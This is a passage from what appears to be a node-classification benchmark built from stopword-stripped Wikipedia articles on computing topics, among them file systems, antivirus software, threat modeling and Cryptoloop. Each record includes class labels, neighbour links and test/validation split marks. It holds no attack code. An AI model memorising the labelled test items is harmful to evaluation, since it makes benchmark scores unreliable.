    "text": "Storage_Resource_Broker:storage resource broker storage resource broker srb data grid management computer software used computational science research projects srb logical distributed file system based client-server architecture presents users single global logical namespace file hierarchy srb provides uniform interface heterogeneous computer data storage resources network part implements logical namespace distinct physical file names maintains metadata data-objects files users groups resources collections items srb metadata catalog mcat stored relational database management system system user-defined metadata queried locate files based attributes well name srb runs various versions unix linux microsoft windows srb system middleware sense built top major software packages various storage systems real-time data sources relational database management system etc callable library functions utilized higher level software however complete many middleware software systems implements comprehensive distributed data management environment including various end-user client applications features support management collaborative controlled sharing publication replication transfer preservation distributed data collections srb sometimes used conjunction computational grid computing systems globus alliance utilize globus alliance grid security infrastructure gsi authentication system srb store retrieve data archival storage systems high performance storage system sam-fs disk file systems unix linux windows binary large objects tabular data relational database management systems tape libraries srb used since 1997 2008 srb estimated managing two petabytes data licensed srb source distributions freely available academic non-profit organizations nirvana srb commercial version srb featured capabilities specifically adapted government commercial use srb development began 1995 cooperative efforts general atomics data intensive cyber environments group dice san diego supercomputer center sdsc university california san diego ucsd support national science foundation nsf srb builds work reagan moore moore doctorate plasma physics ucsd former computational plasma physicist general atomics joined san diego supercomputer center inception project distributed object computation testbed funded darpa us patent trademark office 1998 1999 2003 general atomics granted exclusive license ucsd develop srb commercial applications new versions announced 2008 2012 integrated rule-oriented data management system irods follow-on project sdsc srb team became data intensive cyber environments group largely replaced use srb irods based srb concepts completely re-written includes highly-configurable rule engine core fully open source conferences 2011 included demonstrations irods",
    "neighbors": [
      9762,
      5956,
      1862,
      105,
      1801,
      6797,
      6770,
      5492,
      661,
      823,
      5433,
      8122
    ],
    "mask": "Test"
  },
  {
    "node_id": 1450,
    "label": 6,
    "text": "Blue_Whale_Clustered_file_system:blue whale clustered file system blue whale clustered file system bwfs shared disk file system also called clustered file system shared storage file systems san file system made tianjin zhongke blue whale information technologies company china bwfs enables simultaneous file access across heterogeneous platforms high-performance file creation storing sharing bwfs installed hosts connected disk array storage area network san client systems required run operating system access shared filesystem containing stornext data january 2010 operating systems available client software microsoft windows linux mac os x. bwfs convert many fibrechannel iscsi disk arrays storage cluster supports multi-server parallel processing provide high-performance extensible file-sharing service sustains multi-machine workflow applications cluster environment bwfs file system realized mode direct data access shared file data directly access fc iscsi disk array san network transfer data skipping file server nas head fully displays advantage high bandwidth san environment bwfs allows great enhancement system processing ability simultaneous file without changing front-end application environment back-end san condition bwfs backs mdc redundant structure meta data controller providing excellent performance high availability capabilities combined san infrastructure bring system reliability data security storage enterprise level bwfs supporting heterogeneous multi-operating system platform allowing multiple servers concurrently access set disk files without concerning type respective file system currently bwfs supports variety enterprise-class linux platform windows 2000 windows xp windows 2003 aiming different operating systems bwfs different client programs able identify provide access bwfs shared file system ensure consistent presentation file system different operating system io requests handled properly multiple servers concurrently access file system certain mechanism needed prevent two servers writing disk location also ensured certain server read different content reading file server upgrading file bwfs mechanism function provided metadata controller mdc responsible coordinating access server bwfs file system located outside read write path file data client communicates separate ip links mdc obtain location files resource allocation information data block san network disk directly read written block-level mode design architecture called “ band transmission frame ” asymmetric architecture technical term data access process broken follows bwfs designed basis san environment allowing large number servers workstations connecting fc san ip san iscsi directly access file system bwfs fc use one fc links access disk resources io performance single server extended several gb 100 mb/s simply increasing fc hba card course overall performance system relevant performance host network also influenced performance disk constituting file system bwfs file system structured lun multiple disk arrays equals another layer raid structured multiple disk arrays maximizes performance disk arrays another factor performance factor considered location metadata file consists actual data metadata actual data content file metadata includes file attributes permissions file created modified deleted metadata information shall modified means file processed reading file data metadata usually large file read written continuously metadata shall read moving magnetic-disc head location disk read write mode much higher randomness degree data metadata memorized disk mode file systems randomness degree large file enhanced accordingly reduce read write performance reason bwfs file system memorizes metadata different disk volume layout continuous file reading writing separated randomness metadata mutually influenced provide higher io bandwidth much possible addition separation data metadata data metadata processed independently different hosts without occupying bandwidth data channel improve concurrency data metadata enhance file system performance 2006 gartner publication said bwfs internet protocol ip cluster file system cfs moved beyond research lab commercialization stage successfully deployed various industries including energy automotive military media sectors success demonstrates strengths china research institutes technology realm despite relative lack commercial experience investment resources compared many western technology providers although cfss yet prevalent mainstream storage market users need high input/output i/o performance — especially leading-edge applications oil gas biotech computer-aided design cad — bwfs offers good price/performance solution users also consider bwfs looking lower-priced cfs users need commercialized solution — like “ box ” interface — consider vendors panasas isilon ibrix rather bwfs bwfs developed national research centers high performance computers chinese academy sciences 2007 falconstor announced joint venture sell software joint venture named tianjin zhongke blue whale information technologies company located tianjin china venture capital firm vantagepoint capital also made investment announced bwfs would used video satellite intended cover 2008 summer olympics",
    "neighbors": [
      7863,
      2314,
      6797,
      6003,
      823,
      2395
    ],
    "mask": "None"
  },
  {
    "node_id": 1451,
    "label": 4,
    "text": "Dr_Solomon's_Antivirus:dr solomon antivirus dr solomon antivirus toolkit antivirus suite incorporated prevention detection repair microsoft windows 98 novell sco unix sun solaris os/2 written alan solomon international dr. solomon anti-virus toolkit first created 1988 launched commercially 1991 move rival market leaders symantec norton anti-virus mcafee virusscan dr. solomon several computer magazine awards recommendations jerry pournelle recommended column byte magazine 1992 recently wrote solomon unreservedly best virus service around 1993 dr. solomon anti-virus toolkit awarded queens award technological achievement time company name international later became dr. solomon software ltd. uk similarly named companies germany usa australia 1997 infoworld stated dr. solomon ’ “ best detecting viruses ” previous tension two software products june 9 1998 mcafee network associates agreed acquire dr. solomon group p.l.c leading european manufacturer antivirus software 642 million stock",
    "neighbors": [
      704,
      9569,
      2213,
      6797,
      7983,
      5586,
      6643,
      5492,
      7515
    ],
    "mask": "None"
  },
  {
    "node_id": 1452,
    "label": 8,
    "text": "Yahoo!_Search_BOSS:yahoo search boss yahoo search boss build search service yahoo developer network initiative provide open search web services platform yahoo discontinued boss json search api boss placefinder api boss placespotter api well boss hosted search march 31 2016 yahoo boss succeeded yahoo partner ads ypa yahoo launched boss july 2008 2012 yahoo expanded yahoo search boss platform provide additional services boss hosted search enable website owner embed yahoo web search experience free site main goal idea boss give users case developers access yahoo search index small fee results could supplied developer website program could manipulate resources according product requirements boss allowed results returned xml json html text allowed use comprehensive search features available yahoo like pulling results page searching inside pdfs etc ranking websites search term yahoo search ranking since pulling index ranking one boss key differentiators free use boss white label ads required service using yahoo search engine millions r invested years since yahoo boomed 1990s web developers able get much higher quality results built search engine aug 17th 2010 yahoo stated boss would require sort ad fee-based model sustain boss hosted search completely self serve product enabled web site owner embed yahoo web search experience site free search experience hosted yahoo provided iframe could embedded web site search experience similar search.yahoo.com product provided free web site owners got percentage ad revenue share user clicked search ad within frame web site owners could also customize iframe adding partner logo next search box removing left rail removing yahoo search box altogether using implementing boss hosted search iframe web site owners needed simply sign yahoo search boss portal copy/paste javascript code snippet site yahoo also launched reporting module provide web site owners insights many searches conducted boss hosted search revenue generated according yahoo press meeting 2009 30 million queries day run boss powered web search pages",
    "neighbors": [
      488,
      8627,
      8735,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 1453,
    "label": 4,
    "text": "Threat_model:threat model threat modeling process potential threats structural vulnerabilities identified enumerated prioritized – hypothetical attacker ’ point view purpose threat modeling provide defenders systematic analysis probable attacker ’ profile likely attack vectors assets desired attacker threat modeling answers questions like “ high-value assets ” “ vulnerable attack ” “ relevant threats ” “ attack vector might go unnoticed ” conceptually people incorporate form threat modeling daily life ’ even realize commuters use threat modeling consider might go wrong morning drive work take preemptive action avoid possible accidents children engage threat modeling determining best path toward intended goal avoiding playground bully formal sense threat modeling used prioritize military defensive preparations since antiquity shortly shared computing made debut early 1960s individuals began seeking ways exploit security vulnerabilities personal gain result engineers computer scientists soon began developing threat modeling concepts information technology systems early it-based threat modeling methodologies based concept architectural patterns first presented christopher alexander 1977 1988 robert barnard developed successfully applied first profile it-system attacker 1994 edward amoroso put forth concept “ threat tree ” book “ fundamentals computer security technology. ” concept threat tree based decision tree diagrams threat trees graphically represent potential threat system exploited independently similar work conducted nsa darpa structured graphical representation specific attacks it-systems could executed resulting representation called “ attack trees. ” 1998 bruce schneier published analysis cyber risks utilizing attack trees paper entitled “ toward secure system engineering methodology. ” paper proved seminal contribution evolution threat modeling it-systems schneier ’ analysis attacker ’ goal represented “ root node ” potential means reaching goal represented “ leaf nodes. ” utilizing attack tree way allowed cybersecurity professionals systematically consider multiple attack vectors defined target 1999 microsoft cybersecurity professionals loren kohnfelder praerit garg developed model considering attacks relevant microsoft windows development environment stride acrostic spoofing identity tampering data repudiation information disclosure denial service elevation privilege resultant mnemonic helps security professionals systematically determine potential attacker could utilize threat included stride 2003 octave operationally critical threat asset vulnerability evaluation method operations-centric threat modeling methodology introduced focus organizational risk management 2004 frank swiderski window snyder wrote “ threat modeling ” microsoft press developed concept using threat models create secure applications 2014 ryan stillions expressed idea cyber threats expressed different semantic levels proposed dml detection maturity level model attack instantiation threat scenario caused specific attacker specific goal mind strategy reaching goal goal strategy represent highest semantic levels dml model followed ttp tactics techniques procedures represent intermediate semantic levels lowest semantic levels dml model tools used attacker host observed network artefacts packets payloads finally atomic indicators ip addresses lowest semantic level current siem tools typically provide indicators lowest semantic levels therefore need develop siem tools provide threat indicators higher semantic levels conceptually threat modeling practice flows methodology numerous threat modeling methodologies available implementation typically threat modeling implemented using one three approaches independently asset-centric attacker-centric software-centric based volume published online content four methodologies discussed well known stride approach threat modeling introduced 1999 microsoft providing mnemonic developers find 'threats products stride patterns practices asset/entry point amongst threat modeling approaches developed published microsoft references microsoft methodology commonly mean stride data flow diagrams process attack simulation threat analysis pasta seven-step risk-centric methodology provides seven-step process aligning business objectives technical requirements taking account compliance issues business analysis intent method provide dynamic threat identification enumeration scoring process threat model completed security subject matter experts develop detailed analysis identified threats finally appropriate security controls enumerated methodology intended provide attacker-centric view application infrastructure defenders develop asset-centric mitigation strategy focus trike methodology using threat models risk-management tool within framework threat models used satisfy security auditing process threat models based “ requirements model. ” requirements model establishes stakeholder-defined “ acceptable ” level risk assigned asset class analysis requirements model yields threat model threats enumerated assigned risk values completed threat model used construct risk model based asset roles actions calculated risk exposure vast acronym visual agile simple threat modeling underlying principle methodology necessity scaling threat modeling process across infrastructure entire sdlc integrating seamlessly agile software development methodology methodology seeks provide actionable outputs unique needs various stakeholders application architects developers cybersecurity personnel senior executives methodology provides unique application infrastructure visualization scheme creation use threat models require specific security subject matter expertise it-related threat modeling processes start creating visual representation application infrastructure analyzed application infrastructure decomposed various elements aid analysis completed visual representation used identify enumerate potential threats analysis model regarding risks associated identified threats prioritization threats enumeration appropriate mitigating controls depends methodological basis threat model process utilized microsoft methodology pasta trike develop visual representation application-infrastructure utilizing data flow diagrams dfd dfds developed 1970s tool system engineers communicate high level application caused data flow stored manipulated infrastructure upon application runs traditionally dfds utilize four unique symbols data flows data stores processes interactors early 2000s additional symbol trust boundaries added allow dfds utilized threat modeling application-infrastructure system decomposed five elements security experts consider identified threat entry point known threat categories potential threats identified mitigating security controls enumerated additional analysis performed vast methodology distinguished application threat models atm operational infrastructure threat models otm atms built process flow diagrams pfd pfds developed 2011 tool allow agile software development teams create threat models based application design process applications decomposed various features use cases feature described terms widgets code building blocks required build feature features connected communication protocols resulting visualization map user moves various features application otms built end-to-end data flow diagrams similar traditional dfds end end data flow diagrams decompose system various independent grouped shared components component described terms specific attributes components connected communication pathways protocols atm otm constructed methodology specifies potential threats identified enumerated prioritized associated relevant risks mitigating security controls currently number software tools available help threat modeling threat modeling applied also areas vehicle building home automation context threats security privacy like information inhabitant movement profiles working times health situations modeled well physical network-based attacks latter could make use available smart building features i.e. sensors e.g. spy inhabitant actuators e.g. unlock doors",
    "neighbors": [
      1344,
      1315,
      483,
      612,
      1573,
      9160,
      10539,
      9964,
      302,
      7887,
      10865,
      4948,
      7354,
      11611,
      5404,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 1454,
    "label": 6,
    "text": "Parallel_Virtual_File_System:parallel virtual file system parallel virtual file system pvfs open-source parallel file system parallel file system type distributed file system distributes file data across multiple servers provides concurrent access multiple tasks parallel application pvfs designed use large scale cluster computing pvfs focuses high performance access large data sets consists server process client library written entirely user-level code linux kernel module pvfs-client process allow file system mounted used standard utilities client library provides high performance access via message passing interface mpi pvfs jointly developed parallel architecture research laboratory clemson university mathematics computer science division argonne national laboratory ohio supercomputer center pvfs development funded nasa goddard space flight center doe office science advanced scientific computing research program nsf paci hecura programs government private agencies pvfs known orangefs newest development branch pvfs first developed 1993 walt ligon eric blumer parallel file system parallel virtual machine pvm part nasa grant study i/o patterns parallel programs pvfs version 0 based vesta parallel file system developed ibm t. j. watson research center starting 1994 rob ross re-wrote pvfs use tcp/ip departed many original vesta design points pvfs version 1 targeted cluster dec alpha workstations networked using switched fddi like vesta pvfs striped data across multiple servers allowed i/o requests based file view described strided access pattern unlike vesta striping view dependent common record size ross research focused scheduling disk i/o multiple clients accessing file previous results shown scheduling according best possible disk access pattern preferable ross showed depended number factors including relative speed network details file view cases scheduling based network traffic preferable thus dynamically adaptable schedule provided best overall performance late 1994 ligon met thomas sterling john dorband goddard space flight center gsfc discussed plans build first beowulf computer agreed pvfs would ported linux featured new machine next several years ligon ross worked gsfc group including donald becker dan ridge eric hendricks 1997 cluster meeting pasadena ca sterling asked pvfs released open source package 1999 ligon proposed development new version pvfs initially dubbed pvfs2000 later pvfs2 design initially developed ligon ross phil carns ross completed phd 2000 moved argonne national laboratory design implementation carried ligon carns dale witchurch harish ramachandran clemson university ross neil miller rob latham argonne national laboratory pete wyckoff ohio supercomputer center new file system released 2003 new design featured object servers distributed metadata views based mpi support multiple network types software architecture easy experimentation extensibility pvfs version 1 retired 2005 pvfs version 2 still supported clemson argonne carns completed phd 2006 joined axicom inc. pvfs deployed several thousand nodes data mining 2008 carns moved argonne continues work pvfs along ross latham sam lang brad settlemyer developed mirroring subsystem clemson later detailed simulation pvfs used researching new developments settlemyer oak ridge national laboratory 2007 argonne began porting pvfs use ibm blue gene/p 2008 clemson began developing extensions supporting large directories small files security enhancements redundancy capabilities many goals conflicted development blue gene second branch cvs source tree created dubbed orange original branch dubbed blue pvfs orangefs track closely represent two different groups user requirements patches upgrades applied branches 2011 orangefs main development line cluster using pvfs nodes designated one client data server metadata server data servers hold file data metadata servers hold metadata include stat-info attributes datafile-handles well directory-entries clients run applications utilize file system sending requests servers network pvfs object based design say pvfs server requests involved objects called dataspaces dataspace used hold file data file metadata directory metadata directory entries symbolic links every dataspace file system unique handle client server look server holds dataspace based handle dataspace two components bytestream set key/value pairs bytestream ordered sequence bytes typically used hold file data key/value pairs typically used hold metadata object-based design become typical many distributed file systems including lustre panasas pnfs pvfs designed client access server metadata access data servers without interaction metadata servers removes critical bottleneck system allows much greater performance client program requests data pvfs supply description data based mpi_datatypes facility allows mpi file views directly implemented file system mpi_datatypes describe complex non-contiguous patterns data pvfs server data codes implement data flows efficiently transfer data multiple servers clients pvfs uses networking layer named bmi provides non-blocking message interface designed specifically file systems bmi multiple implementation modules number different networks used high performance computing including tcp/ip myrinet infiniband portals pvfs servers designed share state clients server crashes another easily restarted place updates performed without using locks pvfs clients servers run user level kernel modifications needed optional kernel module allows pvfs file system mounted like file system programs link directly user interface mpi-io posix-like interface features makes pvfs easy install less prone causing system crashes pvfs interface designed integrate system level similarities linux vfs making easy implement mountable file system equally adaptable user level interfaces mpi-io posix-like interfaces exposes many features underlying file system interfaces take advantage desired pvfs consists 4 main components number utility programs components pvfs2-server pvfslib pvfs-client-core pvfs kernel module utilities include karma management tool utilities pvfs-ping pvfs-ls pvfs-cp etc operate directly file system without using kernel module primarily maintenance testing another key design point pvfs protocol describes messages passed client server though strictly component pvfs server runs process node designated i/o node i/o nodes often dedicated nodes regular nodes run application tasks well pvfs server usually runs root run user preferred server manage multiple distinct file systems designated run metadata server data server configuration controlled configuration file specified command line servers managing given file system use configuration file server receives requests network carries request may involve disk i/o responds back original requester requests normally come client nodes running application tasks come servers server composed request processor job layer trove bmi flow layers request processor consists server process main loop number state machines state machines based simple language developed pvfs manage concurrency within server client state machine consists number states either runs c state action function calls nested subroutine state machine either case return codes select state go next state action functions typically submit job via job layer performs kind i/o via trove bmi jobs non-blocking job issued state machine execution deferred another state machine run servicing another request jobs completed main loop restarts associated state machine request processor state machines various request types defined pvfs request protocol plus number nested state machines used internally state machine architecture makes relatively easy add new requests server order add features optimize specific situations job layer provides common interface submitting trove bmi flow jobs reporting completion also implements request scheduler non-blocking job records kind requests progress objects prevents consistency errors due simultaneously operating file data trove manages i/o objects stored local server trove operates collections data spaces collection independent handle space used implement distinct pvfs file systems data space pvfs object unique within collection handle stored one server handles mapped servers table configuration file data space consists two parts bytestream set key/value pairs bytestream sequence bytes indeterminate length used store file data typically file local file system key/value pairs used store metadata attributes directory entries trove well defined interface implemented various ways date implementation trove-dbfs implementation stores bytestreams files key/value pairs berkeley db database trove operations non-blocking api provides post functions read write various components functions check wait completion",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      7225,
      1594,
      11323,
      9277,
      8772,
      1109,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      6935,
      11033,
      287,
      1823,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      7983,
      6961,
      6963,
      1844,
      823,
      6970,
      11072,
      3909,
      330,
      2378,
      4431,
      5969,
      346,
      2394,
      2395,
      2397,
      10596,
      2407,
      10087,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      1933,
      7565,
      6545,
      10641,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      7126,
      2015,
      1509,
      9189,
      7663,
      11256,
      2555,
      2045,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 1455,
    "label": 2,
    "text": "Turkix:turkix turkix live linux distribution capable self-installing hard disk using graphical wizard main goal turkix provide user-friendly linux environment turkix based mandriva distribution visual style turkix similar windows xp first two releases turkix 1.0 1.9 turkish azerbaijani later releases language support especially english latest stable release turkix 3.0 last unstable release 10.0 alpha point project aborted",
    "neighbors": [
      5380,
      8837,
      2310,
      7435,
      10127,
      2321,
      5397,
      4887,
      6680,
      10394,
      10016,
      673,
      3745,
      10530,
      9064,
      9253,
      10149,
      11305,
      7854,
      2738,
      4790,
      823,
      439,
      56,
      59,
      7483,
      3903,
      4673,
      8262,
      2375,
      4039,
      5067,
      8907,
      10192,
      1110,
      9693,
      2914,
      485,
      3685,
      5096,
      4841,
      6890,
      7913,
      5356,
      7020,
      7534,
      2671,
      7920,
      8177,
      8554,
      5363,
      9074,
      9461,
      10860,
      6393,
      11388,
      8957
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1456,
    "label": 3,
    "text": "Cryptoloop:cryptoloop cryptoloop linux kernel disk encryption module relies crypto api cryptography framework introduced version 2.5.45 linux kernel mainline cryptoloop first introduced 2.5.x kernel series functionality later incorporated device mapper generic framework used map one block device onto another cryptoloop create encrypted file system within partition within regular file regular file system file encrypted moved another storage device accomplished making use loop device pseudo device enables normal file mounted physical device encrypting i/o loop device data accessed must first decrypted passing regular file system conversely data stored encrypted cryptoloop vulnerable watermarking attacks making possible determine presence watermarked data encrypted filesystem attack exploits weakness iv computation knowledge file systems place files disk attack works file systems soft block size 1024 greater least ext2 ext3 reiserfs minix property attack makes possible detect presence specially crafted watermarked files watermarked files contain special bit patterns detected without decryption newer versions cryptoloop successor dm-crypt less vulnerable type attack used correctly",
    "neighbors": [
      2050,
      3082,
      5139,
      10780,
      10785,
      3618,
      9762,
      6180,
      8242,
      9266,
      9281,
      10817,
      6213,
      8268,
      8283,
      5222,
      10856,
      7794,
      5749,
      4734,
      7812,
      8326,
      4746,
      8331,
      4238,
      10382,
      2195,
      2197,
      2199,
      2711,
      9882,
      1694,
      2723,
      10933,
      5815,
      5822,
      1736,
      2762,
      8909,
      8410,
      10971,
      8928,
      1761,
      2278,
      233,
      4841,
      10482,
      2294,
      8439,
      2809,
      7938,
      4360,
      1813,
      792,
      10016,
      295,
      11568,
      3382,
      823,
      6968,
      7992,
      318,
      3911,
      6988,
      10063,
      5975,
      10091,
      7540,
      8573,
      1406,
      8066,
      900,
      10631,
      5514,
      4493,
      402,
      11155,
      9621,
      8602,
      11678,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      9646,
      9660,
      8640,
      457,
      5067,
      8147,
      2529,
      6625,
      7139,
      8676,
      2021,
      1513,
      3055,
      5105,
      2036,
      3572,
      8186,
      2044
    ],
    "mask": "Test"
  },
  {
    "node_id": 1457,
    "label": 5,
    "text": "Two-way_alternating:two-way alternating two-way alternating communications term sometimes used disambiguate term duplex telecommunications two-way alternating communications channel endpoint either send receive given time send receive time two-way simultaneous communications lets endpoints talk listen simultaneously two-way alternating communications sometimes called half-duplex may fine distinction two-way alternating communications property communication protocol used endpoints underlying communications medium may support either two-way alternating two-way simultaneous communications medium shared transmitting receiving support two-way alternating protocols medium may called physically half-duplex",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 1458,
    "label": 4,
    "text": "Labeled_Security_Protection_Profile:labeled security protection profile labeled security protection profile lspp protection profile within common criteria information technology security evaluation set security functional assurance requirements products lspp requirements derived b1 class us department defense security standard called trusted computer system evaluation criteria tcsec originally published 1985 example z/os v1.7 certified eal4+ lspp 2006",
    "neighbors": [
      4067,
      10962,
      2168,
      5240,
      125
    ],
    "mask": "Test"
  },
  {
    "node_id": 1459,
    "label": 9,
    "text": "Call_graph:call graph call graph also known call multigraph control flow graph represents calling relationships subroutines computer program node represents procedure edge f g indicates procedure f calls procedure g thus cycle graph indicates recursive procedure calls call graphs dynamic static dynamic call graph record execution program example output profiler thus dynamic call graph exact describes one run program static call graph call graph intended represent every possible run program exact static call graph undecidable problem static call graph algorithms generally overapproximations every call relationship occurs represented graph possibly also call relationships would never occur actual runs program call graphs defined represent varying degrees precision precise call graph precisely approximates behavior real program cost taking longer compute memory store precise call graph fully context-sensitive means procedure graph contains separate node call stack procedure activated fully context-sensitive call graph called calling context tree computed dynamically easily although may take large amount memory calling context trees usually computed statically would take long large program least precise call graph context-insensitive means one node procedure languages feature dynamic dispatch java c++ computing static call graph precisely requires alias analysis results conversely computing precise aliasing requires call graph many static analysis systems solve apparent infinite regress computing simultaneously call graphs used different ways one simple application call graphs finding procedures never called call graphs act documentation humans understand programs also serve basis analyses analysis tracks flow values procedures change impact prediction call graphs also used detect anomalies program execution code injection attacks sample call graph generated gprof analyzing",
    "neighbors": [
      1856,
      1952,
      11424,
      10340,
      8582,
      10474,
      6988,
      5677,
      3854,
      815,
      4398,
      5040,
      10672,
      3507,
      11317,
      11030,
      2233,
      2620
    ],
    "mask": "Test"
  },
  {
    "node_id": 1460,
    "label": 0,
    "text": "Martha_Palmer:martha palmer martha stone palmer american computer scientist best known work verb semantics creation ontological resources propbank verbnet palmer received master arts computer science university texas austin 1976 advised robert simmons received phd university edinburgh 1985 thesis titled driving semantics limited domain advised alan bundy palmer currently professor computer science linguistics university colorado boulder previously faculty university pennsylvania palmer served president association computational linguistics 2005 named acl fellow 2014 significant contributions computational semantics development semantic corpora 2017 awarded helen hubert croft professorship university colorado year university named professor distinction title reserved professors received international recognition research",
    "neighbors": [
      5699,
      5667,
      7724,
      5903
    ],
    "mask": "None"
  },
  {
    "node_id": 1461,
    "label": 3,
    "text": "Floating-point_unit:floating-point unit floating-point unit fpu colloquially math coprocessor part computer system specially designed carry operations floating point numbers typical operations addition subtraction multiplication division square root bitshifting systems particularly older microcode-based architectures also perform various transcendental functions exponential trigonometric calculations though modern processors done software library routines general purpose computer architectures one fpus may integrated execution units within central processing unit however many embedded processors hardware support floating-point operations increasingly standard least 32-bit ones cpu executing program calls floating-point operation three ways carry historically systems implemented floating point via coprocessor rather integrated unit addition cpu e.g gpus coprocessors always built cpu fpus rule first generations gpus n't could single integrated circuit entire circuit board cabinet floating-point calculation hardware provided floating point calculations done software takes processor time avoids cost extra hardware particular computer architecture floating point unit instructions may emulated library software functions may permit object code run systems without floating point hardware emulation implemented several levels cpu microcode common practice operating system function user space code integer functionality available cordic floating point emulation methods commonly used modern computer architectures division floating-point operations integer operations division varies significantly architecture like intel x86 dedicated floating-point registers take far independent clocking schemes cordic routines implemented intel 8087 80287 80387 80486 coprocessor series well motorola 68881 68882 kinds floating-point instructions mainly way reduce gate counts complexity fpu sub-system floating-point operations often pipelined earlier superscalar architectures without general out-of-order execution floating-point operations sometimes pipelined separately integer operations since early 1990s many microprocessors desktops servers one fpu modular architecture bulldozer microarchitecture uses special fpu named flexfpu uses simultaneous multithreading physical integer core two per module single threaded contrast intel hyperthreading two virtual simultaneous threads share resources single physical core floating-point hardware supports simplest operations addition subtraction multiplication even complex floating-point hardware finite number operations support example none directly support arbitrary-precision arithmetic cpu executing program calls floating-point operation directly supported hardware cpu uses series simpler floating-point operations systems without floating-point hardware cpu emulates using series simpler fixed-point arithmetic operations run integer arithmetic logic unit software lists necessary series operations emulate floating-point operations often packaged floating-point library cases fpus may specialized divided simpler floating-point operations mainly addition multiplication complicated operations like division cases simple operations may implemented hardware microcode complex operations implemented software current architectures fpu functionality combined units perform simd computation example augmentation x87 instructions set sse instruction set x86-64 architecture used newer intel amd processors 1980s common ibm pc/compatible microcomputers fpu entirely separate cpu typically sold optional add-on would purchased needed speed enable math-intensive programs ibm pc xt compatibles based 8088 8086 socket optional 8087 coprocessor 80286-based systems generally socketed 80287 80386/80386sx based machines 80387 80387sx respectively although early ones socketed 80287 since 80387 exist yet companies manufactured co-processors intel x86 series included cyrix weitek coprocessors available motorola 68000 family 68881 68882 common motorola 68020/68030-based workstations like sun 3 series also commonly added higher-end models apple macintosh commodore amiga series unlike ibm pc-compatible systems sockets adding coprocessor common lower end systems also add-on fpus coprocessor units microcontroller units mcus/µcs /single-board computer sbcs serve provide floating-point arithmetic capability add-on fpus host-processor-independent possess programming requirements operations instruction sets etc often provided integrated development environments ides",
    "neighbors": [
      1024,
      6659,
      6660,
      7173,
      8711,
      9739,
      1548,
      4108,
      9741,
      5649,
      2066,
      7699,
      5655,
      1563,
      10779,
      10781,
      2081,
      36,
      6181,
      8231,
      7211,
      2094,
      3630,
      6705,
      7218,
      11314,
      7734,
      6715,
      2620,
      2623,
      2113,
      1090,
      7234,
      3142,
      2638,
      10840,
      1119,
      9312,
      1122,
      99,
      1635,
      7269,
      3175,
      6247,
      2155,
      4204,
      6252,
      6253,
      8815,
      3185,
      5235,
      8820,
      10357,
      630,
      7286,
      8822,
      4217,
      9851,
      4220,
      3197,
      638,
      6268,
      8834,
      3203,
      7299,
      4741,
      7302,
      4743,
      8325,
      7305,
      10375,
      4237,
      6799,
      4241,
      146,
      7313,
      2708,
      6804,
      8851,
      6815,
      8352,
      5793,
      6818,
      8863,
      7844,
      4773,
      6821,
      6311,
      3241,
      7852,
      9391,
      2224,
      2226,
      7858,
      4276,
      9911,
      11447,
      8890,
      1725,
      2237,
      4286,
      5309,
      2241,
      8893,
      2243,
      6339,
      3272,
      4810,
      9932,
      9422,
      5329,
      10966,
      731,
      2269,
      11487,
      7911,
      10985,
      5356,
      9964,
      5358,
      5871,
      1776,
      8944,
      2804,
      757,
      2805,
      3317,
      9976,
      249,
      10485,
      5883,
      1788,
      8700,
      2814,
      6914,
      8450,
      10501,
      1798,
      1801,
      5386,
      6926,
      6415,
      4881,
      1298,
      11539,
      4886,
      3352,
      7963,
      1309,
      10016,
      8481,
      2339,
      6949,
      6950,
      3886,
      7983,
      10543,
      10548,
      309,
      8501,
      1849,
      4411,
      5948,
      9020,
      4928,
      8514,
      5444,
      4423,
      11080,
      6476,
      8525,
      336,
      7505,
      8530,
      2388,
      9044,
      11604,
      344,
      8543,
      1376,
      11107,
      8037,
      3943,
      10601,
      10603,
      8048,
      4465,
      10098,
      10612,
      6006,
      1911,
      1399,
      7033,
      1402,
      1915,
      8058,
      5503,
      9599,
      3457,
      9090,
      3459,
      9092,
      3973,
      9095,
      392,
      3467,
      9611,
      1933,
      398,
      3470,
      3472,
      5518,
      5523,
      407,
      9111,
      409,
      10658,
      3493,
      8102,
      9126,
      9638,
      426,
      10669,
      1967,
      2480,
      10675,
      1463,
      7607,
      8125,
      4030,
      1983,
      7104,
      1985,
      3010,
      8126,
      453,
      3014,
      2503,
      1480,
      1998,
      7631,
      5073,
      466,
      3540,
      2517,
      4565,
      1499,
      1502,
      7134,
      992,
      5088,
      5090,
      995,
      7653,
      1000,
      7657,
      9707,
      8684,
      1005,
      3565,
      4078,
      6639,
      10224,
      10734,
      499,
      4596,
      10746,
      508
    ],
    "mask": "None"
  },
  {
    "node_id": 1462,
    "label": 3,
